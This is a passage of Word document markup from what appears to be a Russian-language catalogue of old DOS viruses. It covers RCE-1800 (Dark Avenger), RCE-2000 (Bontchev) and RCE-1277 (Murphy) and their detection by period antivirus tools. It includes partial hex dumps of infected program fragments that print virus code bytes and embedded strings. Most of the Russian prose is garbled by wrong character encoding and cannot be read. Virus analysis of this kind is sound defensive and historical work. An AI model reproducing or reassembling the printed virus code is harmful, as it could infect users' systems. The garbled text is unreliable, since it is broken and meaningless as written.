      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫�����, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� ��᫥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७��ॣ �⨬  �ࠢ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �����⨢  ��᫥  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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���� ����஫��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㬬 � ������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫���� �� 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ��⠢���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����� ��᫥����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 COM- � EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� �� �⮣�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠢��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥡ� ��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⢨� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ண��� ���२ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣�� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>VIRBLK.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-1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0   E9 E8 07 2E 80 3E 54 03 01 75 03 E9 14 02 2E C6  .....&gt;T..u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   06 0E 04 2A 90 80 FC 3D 74 12 80 FC 3C 74 16 80  ...*...=t...&lt;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  ... ... ... ... ... ... ... ... ... ... ... ...  ... ... ..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F0   A2 4F 08 BA 2B 08 B4 09 CD 21 B4 4C CD 21 56 49  .O..+....!.L.!VI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0   52 42 4C 4F 43 4B 20 2D 20 56 65 72 73 2E 32 2E  RBLOCK - Vers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0   31 0D 0A 24 28 43 29 20 31 39 38 38 20 62 79 20  1..$(C) 1988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0   4D 69 63 68 61 65 6C 20 27 54 68 65 20 50 43 2D  Michael 'Th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0730   47 75 72 75 27 20 46 69 74 7A 2C 20 56 69 65 6E  Guru' Fitz, V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0   6E 61 0D 0A 20 20 20 20 20 20 20 20 20 48 61 63  na..         Hac</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0750   6B 65 64 20 61 6E 64 20 69 6D 70 72 6F 76 65 64  ked and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0   20 62 79 20 4D 61 6E 66 72 65 64 20 53 74 65 69   by Manfred S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0   64 6C 0D 0A 24 0D 0A 56 49 52 42 4C 4F 43 4B 20  dl..$..VI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780   61 6C 72 65 61 64 79 20 69 6E 73 74 61 6C 6C 65  already inst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790   64 21 24 0D 0A 45 6E 74 65 72 20 27 56 49 52 42  d!$..Enter 'VIRB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>07A0   4C 4F 43 4B 20 41 27 20 66 6F 72 20 61 6C 6C 6F  LOCK A' for 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07B0   77 61 6E 63 65 20 6F 72 24 0D 0A 20 20 20 20 20  wance or$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C0   20 27 56 49 52 42 4C 4F 43 4B 20 44 27 20 74 6F   'VIRBLOCK D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7D0   20 64 65 6E 79 20 66 75 72 74 68 65 72 20 61 63   deny further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07E0   63 65 73 73 20 74 6F 20 2E 43 4F 4D 20 6F 72 20  cess to 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7F0   2E 45 58 45 2D 46 69 6C 65 73 24 0D 0A 4E 6F 77  .EXE-Files$.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0   20 61 63 63 65 73 73 20 74 6F 20 2E 43 4F 4D 20   access to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0   6F 72 20 2E 45 58 45 20 69 73 20 24 61 6C 6C 6F  or .EXE is $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0   77 65 64 24 64 65 6E 69 65 64 24 75 6E 63 68 61  wed$denied$un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0   6E 67 65 64 20 64 75 65 20 74 6F 20 69 6C 6C 65  nged due to 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0   67 61 6C 20 50 61 72 61 6D 65 74 65 72 20 27 3F  gal Parameter '?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0   27 24 0D 0A 50 72 6F 74 65 63 74 69 6F 6E 20 66  '$..Protection f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0   6F 72 20 2E 43 4F 4D 20 61 6E 64 20 2E 45 58 45  or .COM and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70   2D 66 69 6C 65 73 20 77 61 73 20 24 4F 46 46 24  -files was $OFF$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0   4F 4E 24 45 64 64 69 65 20 6C 69 76 65 73 2E 2E  ON$Eddie liv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0   2E 73 6F 6D 65 77 68 65 72 65 20 69 6E 20 74 69  .somewhere in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08A0   6D 65 21 00 00 90 23 12 1E 8C C3 83 C3 10 2E 03  me!...#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B0   9C FF 06 2E 89 9C 53 00 2E 8B 9C FD 06 2E 89 9C  ......S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C0   51 00 8C C3 83 C3 10 2E 03 9C 03 07 8E D3 2E 8B  Q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D0   A4 01 07 EA 00 00 00 00 BF 00 01 81 C6 05 07 A4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E0   A5 8B 26 06 00 33 DB 53 FF 64 F5 E8 00 00 5E 81  ..&amp;..3.S.d....^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F0   EE 6B 00 FC 2E 81 BC 05 07 4D 5A 74 0E FA 8B E6  .k.......MZ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 ... ... ... ... ... ... ... ... ... ... ... ...  ... ... ..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B40   9D CF 2E 89 16 4F 07 2E 8C 1E 51 07 9D CF 2E C4  .....O....Q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B50   1E 4B 07 9D CF 2E C4 1E 4F 07 9D CF E8 1F 01 E8  .K......O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B60   39 03 9D 2E FF 2E 4F 07 44 69 61 6E 61 20 50 2E  9.....O.Dian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0B70   00 55 8B EC FF 76 06 9D 5D 9C E8 28 03 3D 21 25  .U...v..]..(.=!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 ... ... ... ... ... ... ... ... ... ... ... ...  ... ... ..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F00   B4 62 E8 72 FD 8C C8 48 4B 8E DB F9 13 1E 03 00  .b.r...HK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F10   3B D8 72 F5 5B 58 C3 A1 5B 07 BA 10 00 F7 E2 C3  ;.r.[X..[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F20   54 68 69 73 20 70 72 6F 67 72 61 6D 20 77 61 73  This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0F30   20 77 72 69 74 74 65 6E 20 69 6E 20 74 68 65 20  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0F40   63 69 74 79 20 6F 66 20 53 6F 66 69 61 20 28 43  city of Sofia (C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0F50   29 20 31 39 38 38 2D 38 39 20 44 61 72 6B 20 41  ) 1988-89 Da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0F60   76 65 6E 67 65 72 00 80 FC 03 75 0F 80 FA 80 73  venger....u....s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0F70   05 EA 7A 0F 70 00 EA 7A 0F 70 00 EA 7A 0F 70 00  ..z.p..z.p..z.p.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0F80   00 01 68 11 06 0E 2E C6 E9 15 05 00 00 00 00 00  ..h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F90   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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FA0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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FB0  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2. ����� RCE-2000 (V2000, Bontchev - ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祢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RCE-2000 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稫 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� �������� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>裡 � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� � ⥫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ᮤ�ঠ��� ��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ������ ⥪�⮢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"Zopy me - I want to travel" (� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �.�. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ�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ࠦ����� �ணࠬ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"(c) 1989 by Vesselin Bontchev" (� ����  ⥫�  �����,  �.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����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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⥫� ����� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"����� 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���� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨫ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��� 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. ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨஢�� � ��� �ᯮ������ �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㬥��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����� �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� ������ �.�.�����᪮��, ����� ����� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室��� ᫥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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t xml:space="preserve">ﬨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t xml:space="preserve"> � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>26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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 㢥��稢����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2000 ���⮢, ��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ᮧ����� � ��ਡ��� ������� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��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⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᢮�  ⥫�  �  �����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 � ���� �� ���� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� �� ��砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">࠭��� ��ࠣ�� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ��  �믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1959 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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠪ�୮ ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬮ��� �� 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 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ������� �ᥣ� ⥫� �� �࠭��� ��ࠣ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭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  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ন������  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t xml:space="preserve">ﭭ� � ࠢ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2000</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> ����.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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ������ ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2000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⠤�� ������,  ��� � � ����� RCE-1800,  ��⮨� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨�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⤥����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᥪ�஢  ��᪠  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�  ��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠���� �㫥��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ�� ⥪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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬� ⮣�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� ��⥬ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢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ᮧ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">62 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭤</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��� ������ ���᪮� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�-64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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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㦥� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪢� � ��५� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1990 ����.  �᫨ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"(c) 1989 by Vesselin Bontchev.", � RCE-2000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ᠭ ��ᥫ���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祢� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ��⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(1989 �.?).  � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠢ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쥧�� ������ �⭮�⥫쭮 ����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⢠  �����  RCE-1800.  � �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯫ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� ����� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>த�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮�� ������᪮� ��㯯�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ��������, � ���� ��.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����� (��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥫ�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祢 ����稫 ��� �� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1984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᫥����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.�.�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣�� ��� 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AIDSTEST (����� 29 �� 18.04.90, ����� 345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ଠ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⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN80 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"V2000". ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣨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����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bontchev � ����� �.  ��᫥���� �������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易�� � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⥫� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮤ�ন��� ��ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"����� 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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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⥪������ ������⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">SCAN80.  � ����⢥  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">짮���� ����䠣 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AIDSTEST. ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">०������ ����ᮬ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮����� � ������� ������쭮�� ���⥪�⭮�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠  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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, PCTools. ��� ����⢨� �� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�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᪠ ᫥��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮����� ⮫쪮 �� �᫮���  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।���⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮�  ����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樮���� ��⥬� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫�����, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMY2008.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE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: E9 35 08 90 90 90 90 90  90 90 90 90 90 90 90 90   .5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: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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D0: 90 90 90 90 90 90 C3 1A  5A 6F 70 79 20 6D 65 20   ........Zop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7E0: 2D 20 49 20 77 61 6E 74  20 74 6F 20 74 72 61 76   - I want to trav</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>07F0: 65 6C 00 00 90 51 13 81  C6 B5 07 8C C3 83 C3 10   el...Q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0: 2E 03 5C 02 2E 89 9C 96  F8 2E 8B 1C 2E 89 9C 94   ..\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0: F8 8C C3 83 C3 10 2E 03  5C 06 8E D3 2E 8B 64 04   ........\....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0: EA 00 00 00 00 BF 00 01  81 C6 BD 07 A4 A5 8B 26   ...............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0: 06 00 33 DB 53 FF 64 F5  E8 00 00 5E 81 EE 63 00   ..3.S.d....^.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0: FC 2E F6 94 89 07 2E 81  BC BD 07 4D 5A 74 0E FA   ...........MZ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0: 8B E6 81 C4 C0 08 FB 3B  26 06 00 73 C8 50 06 56   .......;&amp;..s.P.V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0: 1E 8B FE 33 C0 50 8E D8  C5 16 4C 00 B4 30 CD 21   ...3.P....L..0.!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0870: 2E 88 84 12 08 86 C4 3D  1E 03 72 0C B4 13 CD 2F   .......=..r..../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0: 1E 52 B4 13 CD 2F 5A 1F  2E 89 94 A7 07 2E 8C 9C   .R.../Z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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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F00: 26 8B 0E 06 00 2B FF BE  89 07 AC F2 AE 75 0D 51   &amp;....+.......u.Q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0F10: 57 B9 11 00 F3 A6 5F 59  75 ED EB E4 C6 06 13 08   W....._Yu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F20: 00 EB C6 E8 AA FD B4 51  CD 21 2B FF 8B C7 4B 13   .......Q.!+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0F30: D8 8E DB 8B 45 03 80 3D  5A 72 F4 3B 7D 01 75 A9   ....E..=Zr.;}.u.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0F40: 43 8E C3 3D 00 10 72 03  B8 00 10 B1 03 D3 E0 8B   C..=..r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F50: C8 F3 AB EB 94 28 63 29  20 31 39 38 39 20 62 79   .....(c) 1989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F60: 20 56 65 73 73 65 6C 69  6E 20 42 6F 6E 74 63 68    Vesselin Bon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0F70: 65 76 2E 00 80 FC 03 75  0F 80 FA 80 73 05 EA 59   ev.....u....s..Y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0F80: EC 00 F0 EA 26 AF 00 F0  EA 75 01 3E 14 00 01 A3   ....&amp;....u.&gt;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F90: 14 90 90 90 90 E9 02 01  84 A8 A0 AD A0 20 8F 2E   ............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FA0: 00 55 8B EC FF 76 06 9D                            .U...v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6. ����� RCE-1277 (Merphy -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RCE-1277 ���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�� ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭�� 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ਨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稫 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� �������� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>裡 � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� � ⥫� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�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筮 ������ ⥪�⮢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, I'm Mur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e to meet you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written since Nov/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write (c)1989 by Lubo &amp; Ian, Sofia, USM Labor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RCE-1277 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������  ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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 xml:space="preserve">䠩��  ⨯� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠪ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室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᪥ �ணࠬ� �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ࠦ��� �������� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM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  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>27107  ���⮢ (�᫨ ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
